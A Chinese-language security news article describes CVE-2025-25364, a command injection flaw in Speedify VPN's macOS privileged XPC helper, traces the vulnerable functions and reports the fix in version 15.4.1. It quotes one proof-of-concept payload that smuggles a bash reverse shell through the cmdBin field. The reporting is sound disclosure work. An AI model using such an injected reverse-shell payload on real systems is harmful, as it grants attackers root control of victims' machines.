Speedify VPN macOS 漏洞使攻击者能够提升权限

Speedify VPN 的macOS 应用程序中发现了一个重大安全漏洞，编号为 CVE-2025-25364，该漏洞使用户面临本地权限提升和整个系统被入侵的风险。 

SecureLayer7 发现的该漏洞存在于特权辅助工具 me.connectify.SMJobBlessHelper 中，该工具负责为 Speedify VPN 客户端以 root 权限执行系统级操作。该漏洞源于辅助工具的XPC（跨进程通信）接口中不正确的输入验证。

具体来说，传入的 XPC 消息中的两个用户控制字段（cmdPath 和 cmdBin）被直接用于构造命令行字符串，而没有经过充分的清理。 

这个疏忽导致了命令注入漏洞，允许任何本地攻击者制作恶意 XPC 消息并注入以 root 身份执行的任意 shell 命令。

攻击链涉及几个功能：

XPC_Connection_Handler_block_invoke： XPC 消息的入口点。它检查字典类型的消息，如果“request”字段为“runSpeedify”，则调用 _handleLaunchSpeedifyMsg。cmdPath 或 cmdBin 的内容未进行验证。

_handleLaunchSpeedifyMsg：从 XPC 字典中检索 cmdPath 和 cmdBin，并将它们（未经检查）传递给下一个函数。

_RunSystemCmd：使用 asprintf 构造并执行命令字符串，直接嵌入用户提供的 cmdPath 和 cmdBin。关键代码如下：

然后使用 system() 执行该命令字符串，这使得攻击者可以轻松注入其他 shell 命令。

概念验证漏洞

概念验证 (PoC) 漏洞通过向易受攻击的服务发送精心设计的 XPC 消息 证明了该问题。

通过将 cmdBin 设置为诸如“; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo ”之类的有效载荷，攻击者可以生成具有 root 权限的反向 shell。该漏洞代码以 Objective-C 编写，连接到 me.connectify.SMJobBlessHelper XPC 服务并传递恶意负载，从而立即获得 root 级访问权限。

由于辅助工具作为根级守护进程

 (/Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper) 运行，成功利用该漏洞意味着攻击者可以：

读取、修改或删除敏感系统文件。

安装持久性恶意软件或后门。

完全控制受影响的 macOS 设备。

因此，此漏洞对运行 Speedify VPN 易受攻击版本（15.4.1 之前版本）的任何系统都构成严重风险。

Speedify VPN在 15.4.1 版本中解决了该漏洞，其中包括对辅助工具的完全重写。 

新版本消除了不安全的 XPC 处理并实现了适当的输入验证，关闭了命令注入向量。 

强烈建议用户更新到最新版本，以降低被利用的风险。